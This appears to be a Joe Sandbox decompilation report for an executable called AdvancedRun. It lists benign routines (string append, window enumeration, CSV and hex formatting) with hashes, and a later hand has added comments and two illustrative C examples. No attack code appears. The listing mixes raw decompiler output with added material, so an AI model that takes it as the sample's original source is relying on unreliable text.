• Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                  				/* Appends _a4 to __edi and caps the result at 0x3ff characters, so the caller's
                                                                  				   buffer is expected to hold 0x400 wchar_t including the terminator. */
                                                                  				int _t10;
                                                                  				int _t12;
                                                                  				void* _t23;
                                                                  				wchar_t* _t24;
                                                                  				signed int _t25;

                                                                  				_t24 = __edi;
                                                                  				_t25 = wcslen(__edi);                       /* current length of the destination */
                                                                  				_t10 = wcslen(_a4);                         /* length of the string being appended */
                                                                  				_t23 = _t10 + _t25;                         /* combined length without terminator */
                                                                  				if(_t23 >= 0x3ff) {
                                                                  					_t12 = _t10 - _t23 + 0x3ff;             /* = 0x3ff - wcslen(__edi): characters of room left */
                                                                  					if(_t12 > 0) {
                                                                  						wcsncat(__edi + _t25 * 2, _a4, _t12);   /* bounded copy; the "* 2" is the decompiler showing the byte offset */
                                                                  					}
                                                                  				} else {
                                                                  					wcscat(__edi + _t25 * 2, _a4);          /* fits: unbounded copy */
                                                                  				}
                                                                  				return _t24;
                                                                  			}
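The function above is a bounded wide-string append: it only falls back to wcsncat once the combined length reaches 0x3ff, and the count it passes is the room left in the destination. The C below is an added example, not code from the sample or from the AdvancedRun project, that reimplements the same bound and checks it against a guard word placed just past the buffer. The buffer size BUF_WCHARS, the function names and the prefill harness are assumptions made for illustration.

```c
#include <stddef.h>
#include <wchar.h>

/* Constructed example, not code from the sample: the bounded concatenation
 * that E004050E1 implements. Callers' buffers are assumed to be BUF_WCHARS
 * wide, which is what a 0x3ff character cap implies. */
enum { CAP_CHARS = 0x3ff, BUF_WCHARS = CAP_CHARS + 1 };

/* Append src to dst, never letting the result exceed CAP_CHARS characters.
 * wcsncat(dst, src, n) copies at most n characters and always writes the
 * terminator, so dst must have room for CAP_CHARS + 1 wchar_t. */
wchar_t *append_bounded(wchar_t *dst, const wchar_t *src)
{
    size_t dlen = wcslen(dst);
    size_t slen = wcslen(src);

    if (dlen + slen >= CAP_CHARS) {
        /* room == _t10 - _t23 + 0x3ff in the decompiled code, i.e. CAP_CHARS - dlen */
        long room = (long)CAP_CHARS - (long)dlen;
        if (room > 0)
            wcsncat(dst + dlen, src, (size_t)room);
    } else {
        wcscat(dst + dlen, src);
    }
    return dst;
}

/* Harness (assumed, for the example): fill a BUF_WCHARS buffer with `prefill`
 * copies of 'A', append src and return the resulting length. A guard word
 * just past the buffer detects an overflow: -1 means it was clobbered,
 * -2 means prefill itself was larger than the cap. */
long append_and_measure(size_t prefill, const wchar_t *src)
{
    wchar_t buf[BUF_WCHARS + 1];
    size_t i;

    if (prefill > CAP_CHARS)
        return -2;
    for (i = 0; i < prefill; i++)
        buf[i] = L'A';
    buf[prefill] = L'\0';
    buf[BUF_WCHARS] = (wchar_t)0x7777; /* guard word */

    append_bounded(buf, src);

    if (buf[BUF_WCHARS] != (wchar_t)0x7777)
        return -1;
    return (long)wcslen(buf);
}
```

With 0x3fc characters already present, appending L"abcdef" stops after three characters and the result is exactly 0x3ff long; with the buffer already full nothing is copied. Either way the guard word survives, which is the property a caller relying on a fixed 0x400-wchar_t buffer needs.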








                                                                  (per-line instruction addresses 0x004050e1 to 0x0040512e; the address column lost its pairing with the C-code lines in extraction)

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$wcscatwcsncat
                                                                  • String ID:
                                                                  • API String ID: 291873006-0
                                                                  • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                  • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                  • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                  • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                  				/* Stores the dialog handle and its client rect in the object at __ecx, then walks
                                                                  				   every child window. Per the subcall APIs, E00402D99 calls GetWindowRect and
                                                                  				   MapWindowPoints, i.e. it records each child's position relative to the parent. */
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				struct HWND__* _t11;
                                                                  				struct HWND__* _t14;
                                                                  				struct HWND__* _t15;
                                                                  				void* _t16;

                                                                  				_t14 = __eax;
                                                                  				_t16 = __ecx;
                                                                  				 *((intOrPtr*)(__ecx + 0x10)) = __eax;                 /* keep the parent HWND at +0x10 */
                                                                  				GetClientRect(__eax, __ecx + 0xa14);                    /* RECT at +0xa14 */
                                                                  				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;      /* zero the dword at +0xa24 */
                                                                  				_t15 = GetWindow(GetWindow(_t14, 5), 0);                /* GW_CHILD (5), then GW_HWNDFIRST (0) */
                                                                  				do {
                                                                  					E00402D99(_t15, _t16);                              /* do-while: runs once even when _t15 is NULL */
                                                                  					_t11 = GetWindow(_t15, 2);                          /* GW_HWNDNEXT (2): next sibling */
                                                                  					_t15 = _t11;
                                                                  				} while (_t15 != 0);
                                                                  				return _t11;
                                                                  			}









                                                                  (per-line instruction addresses 0x00402de0 to 0x00402e21; the address column lost its pairing with the C-code lines in extraction)

                                                                  APIs
                                                                  • GetClientRect.USER32 ref: 00402DEF
                                                                  • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                  • GetWindow.USER32(00000000), ref: 00402E0A
                                                                    • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                    • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientPoints
                                                                  • String ID:
                                                                  • API String ID: 4235085887-0
                                                                  • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                  • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                  • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                  • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 72%
                                                                  			E0040B6A6() {
                                                                  				/* Cleanup routine: releases four global heap pointers (0x41c458, 0x41c460,
                                                                  				   0x41c45c, 0x41c464) through L0040B272, which the API ID identifies as
                                                                  				   operator delete (??3@). The globals are not reset to NULL afterwards. */
                                                                  				intOrPtr _t1;
                                                                  				intOrPtr _t2;
                                                                  				intOrPtr _t3;
                                                                  				intOrPtr _t4;

                                                                  				_t1 =  *0x41c458;
                                                                  				if(_t1 != 0) {
                                                                  					_push(_t1);
                                                                  					L0040B272();                  /* operator delete */
                                                                  				}
                                                                  				_t2 =  *0x41c460;
                                                                  				if(_t2 != 0) {
                                                                  					_push(_t2);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t3 =  *0x41c45c;
                                                                  				if(_t3 != 0) {
                                                                  					_push(_t3);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t4 =  *0x41c464;
                                                                  				if(_t4 != 0) {
                                                                  					_push(_t4);
                                                                  					L0040B272();
                                                                  					return _t4;
                                                                  				}
                                                                  				return _t4;
                                                                  			}







                                                                  (per-line instruction addresses 0x0040b6a6 to 0x0040b6e6; the address column lost its pairing with the C-code lines in extraction)

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                  • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                  • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                  • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 75%
                                                                  			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                  				/* Emits one CSV row. For each of the [__ebx+0x2c] columns the field text comes either
                                                                  				   from the callback in _a8 or from the column table at [__ebx+0x2d4]. A field that
                                                                  				   contains ',' or '"' is wrapped in quotes with embedded quotes doubled; fields are
                                                                  				   joined by ',' and the row ends in "\r\n". Only ',' and '"' trigger quoting, so a
                                                                  				   CR or LF inside a field is written through unquoted. */
                                                                  				signed int _v8;                     /* column index */
                                                                  				signed int _v12;                    /* current character, passed as a one-character string */
                                                                  				void* _v16;                         /* the quote character 0x22 */
                                                                  				wchar_t* _v20;                      /* buffer pointer of the temporary string built at _v36 */
                                                                  				intOrPtr _v24;
                                                                  				intOrPtr _v28;
                                                                  				intOrPtr _v32;
                                                                  				char _v36;                          /* temporary string object fed to E0040565D */
                                                                  				void* __edi;
                                                                  				signed int _t39;
                                                                  				wchar_t* _t41;
                                                                  				signed int _t45;
                                                                  				signed int _t48;
                                                                  				wchar_t* _t53;
                                                                  				wchar_t* _t62;
                                                                  				void* _t66;
                                                                  				intOrPtr* _t68;
                                                                  				void* _t70;
                                                                  				wchar_t* _t75;
                                                                  				wchar_t* _t79;

                                                                  				_t66 = __ebx;
                                                                  				_t75 = 0;
                                                                  				_v8 = 0;
                                                                  				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                  					do {
                                                                  						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);            /* column id for this index */
                                                                  						_t68 = _a8;
                                                                  						if(_t68 != _t75) {
                                                                  							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));   /* virtual call: field text from the callback */
                                                                  						} else {
                                                                  							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);       /* field text from the column table (0x14-byte entries) */
                                                                  						}
                                                                  						_t41 = wcschr(_t79, 0x2c);                                      /* does the field contain ','? */
                                                                  						_pop(_t70);
                                                                  						if(_t41 != 0) {
                                                                  							L8:
                                                                  							/* quoted path: build  "  + field with every  "  doubled +  "  in the temp string */
                                                                  							_v20 = _t75;
                                                                  							_v28 = _t75;
                                                                  							_v36 = _t75;
                                                                  							_v24 = 0x100;
                                                                  							_v32 = 1;
                                                                  							_v16 = 0x22;
                                                                  							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);    /* opening quote */
                                                                  							while(1) {
                                                                  								_t45 =  *_t79 & 0x0000ffff;
                                                                  								__eflags = _t45;
                                                                  								_v12 = _t45;
                                                                  								_t77 =  &_v36;
                                                                  								if(__eflags == 0) {
                                                                  									break;                                                  /* end of field */
                                                                  								}
                                                                  								__eflags = _t45 - 0x22;
                                                                  								if(__eflags != 0) {
                                                                  									_push( &_v12);                                          /* ordinary character, appended as is */
                                                                  									_t48 = 1;
                                                                  									__eflags = 1;
                                                                  								} else {
                                                                  									_push(L"\"\"");                                         /* embedded quote is doubled */
                                                                  									_t48 = _t45 | 0xffffffff;
                                                                  								}
                                                                  								E0040565D(_t48, _t70, _t77, __eflags);
                                                                  								_t79 =  &(_t79[0]);                                         /* advance to the next wchar_t (decompiler rendering of the increment) */
                                                                  								__eflags = _t79;
                                                                  							}
                                                                  							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);    /* closing quote */
                                                                  							_t53 = _v20;
                                                                  							__eflags = _t53;
                                                                  							if(_t53 == 0) {
                                                                  								_t53 = 0x40c4e8;                                            /* fallback string constant when no buffer was allocated */
                                                                  							}
                                                                  							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);                  /* append the quoted field; E004055D1 then takes the temp string (its destructor, from context) */
                                                                  							_t75 = 0;
                                                                  							__eflags = 0;
                                                                  						} else {
                                                                  							_t62 = wcschr(_t79, 0x22);                                      /* does the field contain '"'? */
                                                                  							_pop(_t70);
                                                                  							if(_t62 != 0) {
                                                                  								goto L8;
                                                                  							} else {
                                                                  								E00407343(_t66, _a4, _t79);                                 /* plain field, appended unquoted */
                                                                  							}
                                                                  						}
                                                                  						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                  							E00407343(_t66, _a4, ",");                                      /* separator between fields only */
                                                                  						}
                                                                  						_v8 = _v8 + 1;
                                                                  					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                  				}
                                                                  				return E00407343(_t66, _a4, L"\r\n");                                          /* row terminator */
                                                                  			}
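The routine above is a CSV row writer: quote a field when it contains ',' or '"', double every embedded '"', join fields with ',' and end the row with "\r\n". The C below is an added example, not code from the sample or from the AdvancedRun project, that does the same in narrow characters (the sample works on wchar_t) with explicit bounds on the output buffer. It deliberately goes one step beyond the decompiled code: a CR or LF inside a field also forces quoting, which the sample does not check, so a multi-line value cannot split a row. The function names, the capacity handling and the constructed input fields are assumptions for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Constructed example, not code from the sample: the CSV row writer that
 * E00407362 implements, in narrow chars. Extension over the sample: CR/LF
 * inside a field also trigger quoting. */
static int csv_needs_quotes(const char *field)
{
    return strpbrk(field, ",\"\r\n") != NULL;
}

/* Append one field at offset `used` of out (capacity cap, always NUL-terminated).
 * A quoted field gets an opening '"', every embedded '"' doubled and a closing
 * '"', the same sequence of E0040565D calls the sample makes. Returns the new
 * length, or -1 if the field does not fit. */
static long csv_put_field(char *out, size_t cap, size_t used, const char *field)
{
    size_t n = used;
    const char *p;
    int quote = csv_needs_quotes(field);

    if (quote) {
        if (n + 1 >= cap) return -1;
        out[n++] = '"';
    }
    for (p = field; *p != '\0'; p++) {
        if (*p == '"') {
            if (n + 2 >= cap) return -1;
            out[n++] = '"';
            out[n++] = '"';
        } else {
            if (n + 1 >= cap) return -1;
            out[n++] = *p;
        }
    }
    if (quote) {
        if (n + 1 >= cap) return -1;
        out[n++] = '"';
    }
    out[n] = '\0';
    return (long)n;
}

/* Write one row: fields joined by ',' and terminated by "\r\n", mirroring the
 * sample's trailing E00407343 calls. Returns the row length, or -1 on overflow
 * (out then still holds a NUL-terminated prefix rather than garbage). */
long csv_write_row(char *out, size_t cap, const char *const *fields, size_t nfields)
{
    size_t i, n = 0;

    if (cap == 0) return -1;
    out[0] = '\0';
    for (i = 0; i < nfields; i++) {
        long r = csv_put_field(out, cap, n, fields[i]);
        if (r < 0) return -1;
        n = (size_t)r;
        if (i + 1 < nfields) {            /* separator between fields only */
            if (n + 1 >= cap) return -1;
            out[n++] = ',';
            out[n] = '\0';
        }
    }
    if (n + 2 >= cap) return -1;
    out[n++] = '\r';
    out[n++] = '\n';
    out[n] = '\0';
    return (long)n;
}

/* Constructed input: a plain field, one with a comma, one with embedded quotes,
 * one spanning two lines, and a trailing plain field. Returns the row from a
 * static buffer, or NULL if it did not fit. */
const char *csv_demo_row(void)
{
    static char row[128];
    static const char *const fields[] = { "a", "b,c", "say \"hi\"", "two\nlines", "x" };
    if (csv_write_row(row, sizeof row, fields, 5) < 0)
        return NULL;
    return row;
}

/* The same kind of input into a buffer that is far too small: must report
 * failure instead of writing past the end. */
long csv_demo_overflow(void)
{
    char tiny[8];
    static const char *const fields[] = { "a", "b,c", "say \"hi\"" };
    return csv_write_row(tiny, sizeof tiny, fields, 3);
}
```

csv_demo_row() yields `a,"b,c","say ""hi""","two\nlines",x` followed by CRLF; the comma field and the quote field are handled exactly as the sample does, and the two-line field is quoted only because of the extension noted above. csv_demo_overflow() returns -1 after the second field no longer fits.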























                                                                  (per-line instruction addresses 0x00407362 to 0x0040748e; the address column lost its pairing with the C-code lines in extraction)

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 004073A4
                                                                  • wcschr.MSVCRT ref: 004073B2
                                                                    • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                    • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcschr$memcpywcslen
                                                                  • String ID: "
                                                                  • API String ID: 1983396471-123907689
                                                                  • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                  • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                  • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                  • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 45%
                                                                  			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                  				char _v8;
                                                                  				intOrPtr _v12;
                                                                  				char _v80;
                                                                  				signed short _v65616;
                                                                  				void* _t27;
                                                                  				intOrPtr _t28;
                                                                  				void* _t34;
                                                                  				intOrPtr _t39;
                                                                  				intOrPtr* _t51;
                                                                  				void* _t52;
                                                                  
                                                                  				_t51 = __esi;
                                                                  				E0040B550(0x1004c, __ecx);
                                                                  				_t39 = 0;
                                                                  				_push(0);
                                                                  				_push( &_v8);
                                                                  				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                  				_push(L"Lines");
                                                                  				_t27 =  *((intOrPtr*)( *__esi))();
                                                                  				if(_v8 > 0) {
                                                                  					do {
                                                                  						_t6 = _t39 + 1; // 0x1
                                                                  						_t28 = _t6;
                                                                  						_push(_t28);
                                                                  						_push(L"Line%d");
                                                                  						_v12 = _t28;
                                                                  						_push(0x1f);
                                                                  						_push( &_v80);
                                                                  						L0040B1EC();
                                                                  						_t52 = _t52 + 0x10;
                                                                  						_push(0x7fff);
                                                                  						_push(0x40c4e8);
                                                                  						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                  							_v65616 = _v65616 & 0x00000000;
                                                                  							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                  							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                  						} else {
                                                                  							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                  						}
                                                                  						_t39 = _v12;
                                                                  					} while (_t39 < _v8);
                                                                  					return _t34;
                                                                  				}
                                                                  				return _t27;
                                                                  			}

                                                                  Instruction addresses: 0x00401676 0x0040167e 0x0040168a 0x0040168c 0x00401690 0x00401691 0x00401696 0x0040169d 0x004016a2 0x004016aa 0x004016aa 0x004016aa 0x004016ad 0x004016ae 0x004016b3 0x004016b9 0x004016bb 0x004016bc 0x004016c1 0x004016c8 0x004016cd 0x004016ce 0x004016ea 0x004016ff 0x0040170c 0x004016d0 0x004016e3 0x004016e3 0x00401711 0x00401714 0x00000000 0x00401719 0x0040171c

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf
                                                                  • String ID: Line%d$Lines
                                                                  • API String ID: 3988819677-2790224864
                                                                  • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                  • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                  • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                  • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 70%
                                                                  			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                  				void* _v8;
                                                                  				void* _v26;
                                                                  				void _v28;
                                                                  				void* _t24;
                                                                  				void* _t25;
                                                                  				void* _t35;
                                                                  				signed int _t38;
                                                                  				signed int _t42;
                                                                  				void* _t44;
                                                                  				void* _t45;
                                                                  
                                                                  				_t24 = _a12;
                                                                  				_t45 = _t44 - 0x18;
                                                                  				_t42 = 0;
                                                                  				 *_t24 = 0;
                                                                  				if(_a8 <= 0) {
                                                                  					_t25 = 0;
                                                                  				} else {
                                                                  					_t38 = 0;
                                                                  					_t35 = 0;
                                                                  					if(_a8 > 0) {
                                                                  						_v8 = _t24;
                                                                  						while(1) {
                                                                  							_v28 = _v28 & 0x00000000;
                                                                  							asm("stosd");
                                                                  							asm("stosd");
                                                                  							asm("stosd");
                                                                  							asm("stosd");
                                                                  							asm("stosw");
                                                                  							_push( *(_t35 + _a4) & 0x000000ff);
                                                                  							_push(L"%2.2X ");
                                                                  							_push(0xa);
                                                                  							_push( &_v28);
                                                                  							L0040B1EC();
                                                                  							_t38 = _t42;
                                                                  							memcpy(_v8,  &_v28, 6);
                                                                  							_t13 = _t42 + 3; // 0x3
                                                                  							_t45 = _t45 + 0x1c;
                                                                  							if(_t13 >= 0x2000) {
                                                                  								break;
                                                                  							}
                                                                  							_v8 = _v8 + 6;
                                                                  							_t35 = _t35 + 1;
                                                                  							_t42 = _t42 + 3;
                                                                  							if(_t35 < _a8) {
                                                                  								continue;
                                                                  							}
                                                                  							break;
                                                                  						}
                                                                  						_t24 = _a12;
                                                                  					}
                                                                  					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                  					_t25 = 1;
                                                                  				}
                                                                  				return _t25;
                                                                  			}

                                                                  Instruction addresses: 0x00405132 0x00405135 0x00405139 0x0040513e 0x00405141 0x004051b3 0x00405143 0x00405145 0x00405147 0x0040514c 0x0040514e 0x00405151 0x00405151 0x0040515b 0x0040515c 0x0040515d 0x0040515e 0x0040515f 0x00405168 0x00405169 0x00405171 0x00405173 0x00405174 0x00405182 0x00405184 0x00405189 0x0040518c 0x00405194 0x00000000 0x00000000 0x00405196 0x0040519a 0x0040519b 0x004051a1 0x00000000 0x00000000 0x00000000 0x004051a1 0x004051a3 0x004051a3 0x004051a6 0x004051af 0x004051b0 0x004051b7

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfmemcpy
                                                                  • String ID: %2.2X
                                                                  • API String ID: 2789212964-323797159
                                                                  • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                  • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                  • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                  • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 43%
                                                                  			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                  				char _v44;
                                                                  				intOrPtr _t22;
                                                                  				signed int _t30;
                                                                  				signed int _t34;
                                                                  				void* _t35;
                                                                  				void* _t36;
                                                                  
                                                                  				_t35 = __esi;
                                                                  				_t34 = 0;
                                                                  				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                  					do {
                                                                  						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                  						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                  						L0040B1EC();
                                                                  						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                  						_push( &_v44);
                                                                  						_push(0x2000);
                                                                  						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                  						L0040B1EC();
                                                                  						_t36 = _t36 + 0x24;
                                                                  						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                  						_t34 = _t34 + 1;
                                                                  					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                  				}
                                                                  				return E00407343(_t35, _a4, L"\r\n");
                                                                  			}

                                                                  Instruction addresses: 0x004075bb 0x004075c2 0x004075c7 0x004075ca 0x004075cd 0x004075d8 0x004075e9 0x004075fc 0x00407600 0x00407601 0x00407606 0x00407609 0x0040760e 0x00407619 0x0040761e 0x0040761f 0x00407624 0x00407636

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf
                                                                  • String ID: %%-%d.%ds
                                                                  • API String ID: 3988819677-2008345750
                                                                  • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                  • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                  • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                  • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
